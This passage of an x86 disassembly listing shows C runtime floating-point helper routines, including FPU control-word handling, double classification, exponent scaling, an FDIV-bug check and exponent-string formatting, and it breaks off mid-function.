loc_42BF7B: ; CODE XREF: sub_42BF40+35�j
mov esp, ebp
pop ebp
retn
sub_42BF40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BF80 proc near ; CODE XREF: sub_42B480+4A�p
; _0:0042B5A2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and eax, 20h
test eax, eax
jz short loc_42BF97
mov [ebp+var_4], 5
jmp short loc_42BFEA
; ---------------------------------------------------------------------------
loc_42BF97: ; CODE XREF: sub_42BF80+C�j
mov ecx, [ebp+arg_0]
and ecx, 8
test ecx, ecx
jz short loc_42BFAA
mov [ebp+var_4], 1
jmp short loc_42BFEA
; ---------------------------------------------------------------------------
loc_42BFAA: ; CODE XREF: sub_42BF80+1F�j
mov edx, [ebp+arg_0]
and edx, 4
test edx, edx
jz short loc_42BFBD
mov [ebp+var_4], 2
jmp short loc_42BFEA
; ---------------------------------------------------------------------------
loc_42BFBD: ; CODE XREF: sub_42BF80+32�j
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_42BFD0
mov [ebp+var_4], 3
jmp short loc_42BFEA
; ---------------------------------------------------------------------------
loc_42BFD0: ; CODE XREF: sub_42BF80+45�j
mov ecx, [ebp+arg_0]
and ecx, 2
test ecx, ecx
jz short loc_42BFE3
mov [ebp+var_4], 4
jmp short loc_42BFEA
; ---------------------------------------------------------------------------
loc_42BFE3: ; CODE XREF: sub_42BF80+58�j
mov [ebp+var_4], 0
loc_42BFEA: ; CODE XREF: sub_42BF80+15�j
; sub_42BF80+28�j ...
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42BF80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C000 proc near ; CODE XREF: _0:0042C099�p
; sub_42C170+EC�p ...
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov dword ptr [ebp+var_C], eax
mov ecx, [ebp+arg_4]
mov dword ptr [ebp+var_C+4], ecx
mov edx, [ebp+arg_8]
add edx, 3FEh
mov [ebp+var_4], edx
mov eax, [ebp+arg_4+2]
and eax, 0FFFFh
and eax, 800Fh
mov ecx, [ebp+var_4]
shl ecx, 4
or eax, ecx
mov word ptr [ebp+var_C+6], ax
fld [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_42C000 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+0Eh]
and eax, 0FFFFh
and eax, 7FF0h
sar eax, 4
mov [ebp-4], ax
mov cx, [ebp-4]
sub cx, 3FEh
mov [ebp-4], cx
movsx eax, word ptr [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+0Eh]
and eax, 0FFFFh
and eax, 7FF0h
sar eax, 4
movsx ecx, ax
mov edx, [ebp+10h]
lea eax, [ecx+edx-3FEh]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
call sub_42C000
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp+0Ch]
mov [ebp-4], ecx
mov edx, [ebp+0Eh]
and edx, 0FFFFh
and edx, 800Fh
mov eax, [ebp+10h]
shl eax, 4
or edx, eax
mov [ebp-2], dx
fld qword ptr [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C0F0 proc near ; CODE XREF: sub_41FFF0+3F�p
; sub_420210+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 7FF00000h
jnz short loc_42C109
cmp [ebp+arg_0], 0
jnz short loc_42C109
mov eax, 1
jmp short loc_42C16A
; ---------------------------------------------------------------------------
loc_42C109: ; CODE XREF: sub_42C0F0+A�j
; sub_42C0F0+10�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_42C11F
cmp [ebp+arg_0], 0
jnz short loc_42C11F
mov eax, 2
jmp short loc_42C16A
; ---------------------------------------------------------------------------
loc_42C11F: ; CODE XREF: sub_42C0F0+20�j
; sub_42C0F0+26�j
mov eax, [ebp+arg_4+2]
and eax, 0FFFFh
and eax, 7FF8h
cmp eax, 7FF8h
jnz short loc_42C13A
mov eax, 3
jmp short loc_42C16A
; ---------------------------------------------------------------------------
loc_42C13A: ; CODE XREF: sub_42C0F0+41�j
mov ecx, [ebp+arg_4+2]
and ecx, 0FFFFh
and ecx, 7FF8h
cmp ecx, 7FF0h
jnz short loc_42C168
mov edx, [ebp+arg_4]
shl edx, 0Dh
test edx, edx
jnz short loc_42C161
cmp [ebp+arg_0], 0
jz short loc_42C168
loc_42C161: ; CODE XREF: sub_42C0F0+69�j
mov eax, 4
jmp short loc_42C16A
; ---------------------------------------------------------------------------
loc_42C168: ; CODE XREF: sub_42C0F0+5F�j
; sub_42C0F0+6F�j
xor eax, eax
loc_42C16A: ; CODE XREF: sub_42C0F0+17�j
; sub_42C0F0+2D�j ...
pop ebp
retn
sub_42C0F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42C170(double,int)
sub_42C170 proc near ; CODE XREF: sub_42BAE0+239�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
fld [ebp+arg_0]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 40h
jz short loc_42C1A0
mov dword ptr [ebp+var_C], 0
mov dword ptr [ebp+var_C+4], 0
mov [ebp+var_4], 0
jmp loc_42C29A
; ---------------------------------------------------------------------------
loc_42C1A0: ; CODE XREF: sub_42C170+14�j
mov eax, dword ptr [ebp+arg_0+6]
and eax, 0FFFFh
and eax, 7FF0h
test eax, eax
jnz loc_42C269
mov ecx, dword ptr [ebp+arg_0+4]
shl ecx, 0Ch
test ecx, ecx
jnz short loc_42C1C9
cmp dword ptr [ebp+arg_0], 0
jz loc_42C269
loc_42C1C9: ; CODE XREF: sub_42C170+4D�j
mov [ebp+var_4], 0FFFFFC03h
fld [ebp+arg_0]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 1
jz short loc_42C1E9
mov [ebp+var_14], 1
jmp short loc_42C1F0
; ---------------------------------------------------------------------------
loc_42C1E9: ; CODE XREF: sub_42C170+6E�j
mov [ebp+var_14], 0
loc_42C1F0: ; CODE XREF: sub_42C170+77�j
mov edx, [ebp+var_14]
mov [ebp+var_10], edx
loc_42C1F6: ; CODE XREF: sub_42C170+C3�j
mov eax, dword ptr [ebp+arg_0+6]
and eax, 0FFFFh
and eax, 10h
test eax, eax
jnz short loc_42C235
mov ecx, dword ptr [ebp+arg_0+4]
shl ecx, 1
mov dword ptr [ebp+arg_0+4], ecx
mov edx, dword ptr [ebp+arg_0]
and edx, 80000000h
test edx, edx
jz short loc_42C222
mov eax, dword ptr [ebp+arg_0+4]
or al, 1
mov dword ptr [ebp+arg_0+4], eax
loc_42C222: ; CODE XREF: sub_42C170+A8�j
mov ecx, dword ptr [ebp+arg_0]
shl ecx, 1
mov dword ptr [ebp+arg_0], ecx
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_42C1F6
; ---------------------------------------------------------------------------
loc_42C235: ; CODE XREF: sub_42C170+93�j
mov ax, word ptr [ebp+arg_0+6]
and ax, 0FFEFh
mov word ptr [ebp+arg_0+6], ax
cmp [ebp+var_10], 0
jz short loc_42C252
mov cx, word ptr [ebp+arg_0+6]
or ch, 80h
mov word ptr [ebp+arg_0+6], cx
loc_42C252: ; CODE XREF: sub_42C170+D5�j
push 0
mov edx, dword ptr [ebp+arg_0+4]
push edx
mov eax, dword ptr [ebp+arg_0]
push eax
call sub_42C000
add esp, 0Ch
fstp [ebp+var_C]
jmp short loc_42C29A
; ---------------------------------------------------------------------------
loc_42C269: ; CODE XREF: sub_42C170+3F�j
; sub_42C170+53�j
push 0
mov ecx, dword ptr [ebp+arg_0+4]
push ecx
mov edx, dword ptr [ebp+arg_0]
push edx
call sub_42C000
add esp, 0Ch
fstp [ebp+var_C]
mov eax, dword ptr [ebp+arg_0+6]
and eax, 0FFFFh
and eax, 7FF0h
sar eax, 4
movsx ecx, ax
sub ecx, 3FEh
mov [ebp+var_4], ecx
loc_42C29A: ; CODE XREF: sub_42C170+2B�j
; sub_42C170+F7�j
mov edx, [ebp+arg_8]
mov eax, [ebp+var_4]
mov [edx], eax
fld [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_42C170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C2B0 proc near ; CODE XREF: sub_42B610+171�p
var_4 = word ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
fstsw [ebp+var_4]
movsx eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42C2B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C2D0 proc near ; CODE XREF: sub_42B610+349�p
var_4 = word ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
fnstsw [ebp+var_4]
fnclex
movsx eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42C2D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C2F0 proc near ; CODE XREF: sub_41FFF0+11�p
; sub_41FFF0+67�p ...
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
fstcw [ebp+var_8]
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
movsx ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
not edx
and ecx, edx
or eax, ecx
mov [ebp+var_4], ax
fldcw [ebp+var_4]
movsx eax, [ebp+var_8]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42C2F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C330 proc near ; CODE XREF: sub_42BAE0+25�p
; sub_42BAE0+50�p ...
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_42C34D
fld ds:tbyte_454178
fistp [ebp+var_C]
wait
loc_42C34D: ; CODE XREF: sub_42C330+11�j
mov ecx, [ebp+arg_0]
and ecx, 8
test ecx, ecx
jz short loc_42C367
fstsw ax
fld ds:tbyte_454178
fstp [ebp+var_8]
wait
fstsw ax
loc_42C367: ; CODE XREF: sub_42C330+25�j
mov edx, [ebp+arg_0]
and edx, 10h
test edx, edx
jz short loc_42C37B
fld ds:tbyte_454184
fstp [ebp+var_8]
wait
loc_42C37B: ; CODE XREF: sub_42C330+3F�j
mov eax, [ebp+arg_0]
and eax, 4
test eax, eax
jz short loc_42C38E
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_42C38E: ; CODE XREF: sub_42C330+53�j
mov ecx, [ebp+arg_0]
and ecx, 20h
test ecx, ecx
jz short loc_42C39E
fldpi
fstp [ebp+var_8]
wait
loc_42C39E: ; CODE XREF: sub_42C330+66�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42C330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C3B0 proc near ; CODE XREF: sub_420130+15�p
; _0:00432025�p
push ebp
mov ebp, esp
push 30000h
push 10000h
call sub_431FF0
add esp, 8
pop ebp
retn
sub_42C3B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C3D0 proc near ; CODE XREF: sub_42C430:loc_42C469�p
var_1C = dword ptr -1Ch
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov dword ptr [ebp+var_18], 80000000h
mov dword ptr [ebp+var_18+4], 4147FFFFh
mov dword ptr [ebp+var_8], 0C0000000h
mov dword ptr [ebp+var_8+4], 4150017Eh
fld [ebp+var_8]
fdiv [ebp+var_18]
fmul [ebp+var_18]
fsubr [ebp+var_8]
fstp [ebp+var_10]
fld [ebp+var_10]
fcomp ds:dbl_43CD98
fnstsw ax
test ah, 41h
jnz short loc_42C41D
mov [ebp+var_1C], 1
jmp short loc_42C424
; ---------------------------------------------------------------------------
loc_42C41D: ; CODE XREF: sub_42C3D0+42�j
mov [ebp+var_1C], 0
loc_42C424: ; CODE XREF: sub_42C3D0+4B�j
mov eax, [ebp+var_1C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42C3D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C430 proc near ; CODE XREF: sub_420130+B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
push offset aKernel32 ; "KERNEL32"
call ds:off_4F5370
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_42C469
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
mov eax, [ebp+var_4]
push eax
call ds:off_4F5390
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_42C469
push 0
call [ebp+var_8]
jmp short loc_42C46E
; ---------------------------------------------------------------------------
loc_42C469: ; CODE XREF: sub_42C430+18�j
; sub_42C430+30�j
call sub_42C3D0
loc_42C46E: ; CODE XREF: sub_42C430+37�j
mov esp, ebp
pop ebp
retn
sub_42C430 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C480 proc near ; CODE XREF: sub_427F60+6CF�p
; DATA XREF: sub_420170+21�o ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
push ecx
call sub_421C90
add esp, 4
cmp eax, 65h
jz short loc_42C4E0
loc_42C49A: ; CODE XREF: sub_42C480+5E�j
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
cmp ds:dword_453DF0, 1
jle short loc_42C4C2
push 4
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_C], eax
jmp short loc_42C4DA
; ---------------------------------------------------------------------------
loc_42C4C2: ; CODE XREF: sub_42C480+2A�j
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_C], edx
loc_42C4DA: ; CODE XREF: sub_42C480+40�j
cmp [ebp+var_C], 0
jnz short loc_42C49A
loc_42C4E0: ; CODE XREF: sub_42C480+18�j
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [ebp+var_8], cl
mov edx, [ebp+arg_0]
mov al, ds:byte_453DF4
mov [edx], al
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_42C4FB: ; CODE XREF: sub_42C480+A2�j
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ebp+var_4], al
mov ecx, [ebp+arg_0]
mov dl, [ebp+var_8]
mov [ecx], dl
mov al, [ebp+var_4]
mov [ebp+var_8], al
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
test edx, edx
jnz short loc_42C4FB
mov esp, ebp
pop ebp
retn
sub_42C480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C530 proc near ; CODE XREF: sub_427F60+6F1�p
; DATA XREF: sub_420170+D�o ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
loc_42C534: ; CODE XREF: sub_42C530+28�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42C55A
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
movsx ecx, ds:byte_453DF4
cmp eax, ecx
jz short loc_42C55A
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp short loc_42C534
; ---------------------------------------------------------------------------
loc_42C55A: ; CODE XREF: sub_42C530+C�j
; sub_42C530+1D�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
test ecx, ecx
jz loc_42C603
loc_42C571: ; CODE XREF: sub_42C530+6A�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42C59C
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
cmp eax, 65h
jz short loc_42C59C
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 45h
jz short loc_42C59C
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_42C571
; ---------------------------------------------------------------------------
loc_42C59C: ; CODE XREF: sub_42C530+49�j
; sub_42C530+54�j ...
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
sub edx, 1
mov [ebp+arg_0], edx
loc_42C5AB: ; CODE XREF: sub_42C530+8F�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
cmp ecx, 30h
jnz short loc_42C5C1
mov edx, [ebp+arg_0]
sub edx, 1
mov [ebp+arg_0], edx
jmp short loc_42C5AB
; ---------------------------------------------------------------------------
loc_42C5C1: ; CODE XREF: sub_42C530+84�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
movsx edx, ds:byte_453DF4
cmp ecx, edx
jnz short loc_42C5DB
mov eax, [ebp+arg_0]
sub eax, 1
mov [ebp+arg_0], eax
loc_42C5DB: ; CODE XREF: sub_42C530+A0�j
; sub_42C530+D1�j
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_4]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
test eax, eax
jz short loc_42C603
jmp short loc_42C5DB
; ---------------------------------------------------------------------------
loc_42C603: ; CODE XREF: sub_42C530+3B�j
; sub_42C530+CF�j
mov esp, ebp
pop ebp
retn
sub_42C530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C610 proc near ; DATA XREF: sub_420170+2B�o
; _2:off_4541A0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_43D2F0
fnstsw ax
test ah, 1
jnz short loc_42C62F
mov [ebp+var_4], 1
jmp short loc_42C636
; ---------------------------------------------------------------------------
loc_42C62F: ; CODE XREF: sub_42C610+14�j
mov [ebp+var_4], 0
loc_42C636: ; CODE XREF: sub_42C610+1D�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42C610 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C640 proc near ; CODE XREF: sub_429E90+1138�p
; DATA XREF: sub_420170+17�o ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_42C66C
mov eax, [ebp+arg_8]
push eax
lea ecx, [ebp+var_8]
push ecx
call sub_432B20
add esp, 8
mov edx, [ebp+arg_4]
mov eax, [ebp+var_8]
mov [edx], eax
mov ecx, [ebp+var_4]
mov [edx+4], ecx
jmp short loc_42C684
; ---------------------------------------------------------------------------
loc_42C66C: ; CODE XREF: sub_42C640+A�j
mov edx, [ebp+arg_8]
push edx
lea eax, [ebp+var_C]
push eax
call sub_432BA0
add esp, 8
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_C]
mov [ecx], edx
loc_42C684: ; CODE XREF: sub_42C640+2A�j
mov esp, ebp
pop ebp
retn
sub_42C640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C690 proc near ; CODE XREF: sub_42CB20+1F�p
var_2C = byte ptr -2Ch
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
lea eax, [ebp+var_14]
mov [ebp+var_4], eax
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
mov edx, [eax]
push edx
call sub_432CE0
add esp, 10h
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_8]
add ecx, 1
push ecx
mov edx, [ebp+var_4]
xor eax, eax
cmp dword ptr [edx], 2Dh
setz al
mov ecx, [ebp+arg_4]
add ecx, eax
xor edx, edx
cmp [ebp+arg_8], 0
setnle dl
add ecx, edx
push ecx
call sub_432BE0
add esp, 0Ch
push 0
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_42C710
add esp, 14h
mov eax, [ebp+arg_4]
mov esp, ebp
pop ebp
retn
sub_42C690 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C710 proc near ; CODE XREF: sub_42C690+67�p
; sub_42CA30+9D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 8
movsx eax, [ebp+arg_10]
test eax, eax
jz short loc_42C747
mov ecx, [ebp+arg_C]
xor edx, edx
cmp dword ptr [ecx], 2Dh
setz dl
mov eax, [ebp+arg_0]
add eax, edx
mov [ebp+var_4], eax
xor ecx, ecx
cmp [ebp+arg_4], 0
setnle cl
push ecx
mov edx, [ebp+var_4]
push edx
call sub_42CB80
add esp, 8
loc_42C747: ; CODE XREF: sub_42C710+C�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 2Dh
jnz short loc_42C764
mov edx, [ebp+var_4]
mov byte ptr [edx], 2Dh
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_42C764: ; CODE XREF: sub_42C710+43�j
cmp [ebp+arg_4], 0
jle short loc_42C788
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov al, [edx+1]
mov [ecx], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov al, ds:byte_453DF4
mov [edx], al
loc_42C788: ; CODE XREF: sub_42C710+58�j
push offset aE000 ; "e+000"
mov ecx, [ebp+var_4]
add ecx, [ebp+arg_4]
movsx edx, [ebp+arg_10]
neg edx
sbb edx, edx
inc edx
add ecx, edx
push ecx
call sub_41F620
add esp, 8
mov [ebp+var_4], eax
cmp [ebp+arg_8], 0
jz short loc_42C7B6
mov eax, [ebp+var_4]
mov byte ptr [eax], 45h
loc_42C7B6: ; CODE XREF: sub_42C710+9E�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_C]
mov eax, [edx+0Ch]
movsx ecx, byte ptr [eax]
cmp ecx, 30h
jz loc_42C86F
mov edx, [ebp+arg_C]
mov eax, [edx+4]
sub eax, 1
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jge short loc_42C7F1
mov ecx, [ebp+var_8]
neg ecx
mov [ebp+var_8], ecx
mov edx, [ebp+var_4]
mov byte ptr [edx], 2Dh
loc_42C7F1: ; CODE XREF: sub_42C710+D1�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
cmp [ebp+var_8], 64h
jl short loc_42C825
mov eax, [ebp+var_8]
cdq
mov ecx, 64h
idiv ecx
mov edx, [ebp+var_4]
mov cl, [edx]
add cl, al
mov edx, [ebp+var_4]
mov [edx], cl
mov eax, [ebp+var_8]
cdq
mov ecx, 64h
idiv ecx
mov [ebp+var_8], edx
loc_42C825: ; CODE XREF: sub_42C710+EE�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
cmp [ebp+var_8], 0Ah
jl short loc_42C859
mov eax, [ebp+var_8]
cdq
mov ecx, 0Ah
idiv ecx
mov edx, [ebp+var_4]
mov cl, [edx]
add cl, al
mov edx, [ebp+var_4]
mov [edx], cl
mov eax, [ebp+var_8]
cdq
mov ecx, 0Ah
idiv ecx
mov [ebp+var_8], edx
loc_42C859: ; CODE XREF: sub_42C710+122�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov cl, [eax]
add cl, byte ptr [ebp+var_8]
mov edx, [ebp+var_4]
mov [edx], cl
loc_42C86F: ; CODE XREF: sub_42C710+BB�j
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn
sub_42C710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C880 proc near ; CODE XREF: sub_42CB20+3B�p
var_2C = byte ptr -2Ch
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
lea eax, [ebp+var_14]
mov [ebp+var_4], eax
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
mov edx, [eax]
push edx
call sub_432CE0
add esp, 10h
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_8]
add edx, [ecx+4]
push edx
mov eax, [ebp+var_4]
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
mov edx, [ebp+arg_4]
add edx, ecx
push edx
call sub_432BE0
add esp, 0Ch
push 0
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
call sub_42C8F0
add esp, 10h
mov eax, [ebp+arg_4]
mov esp, ebp
pop ebp
retn
sub_42C880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C8F0 proc near ; CODE XREF: sub_42C880+5B�p
; sub_42CA30+D9�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
sub ecx, 1
mov [ebp+var_8], ecx
movsx edx, [ebp+arg_C]
test edx, edx
jz short loc_42C943
mov eax, [ebp+arg_8]
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
mov edx, [ebp+arg_0]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnz short loc_42C943
mov ecx, [ebp+var_4]
add ecx, [ebp+var_8]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
mov byte ptr [edx], 30h
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 0
loc_42C943: ; CODE XREF: sub_42C8F0+18�j
; sub_42C8F0+33�j
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 2Dh
jnz short loc_42C960
mov ecx, [ebp+var_4]
mov byte ptr [ecx], 2Dh
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42C960: ; CODE XREF: sub_42C8F0+5F�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jg short loc_42C988
push 1
mov ecx, [ebp+var_4]
push ecx
call sub_42CB80
add esp, 8
mov edx, [ebp+var_4]
mov byte ptr [edx], 30h
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_42C994
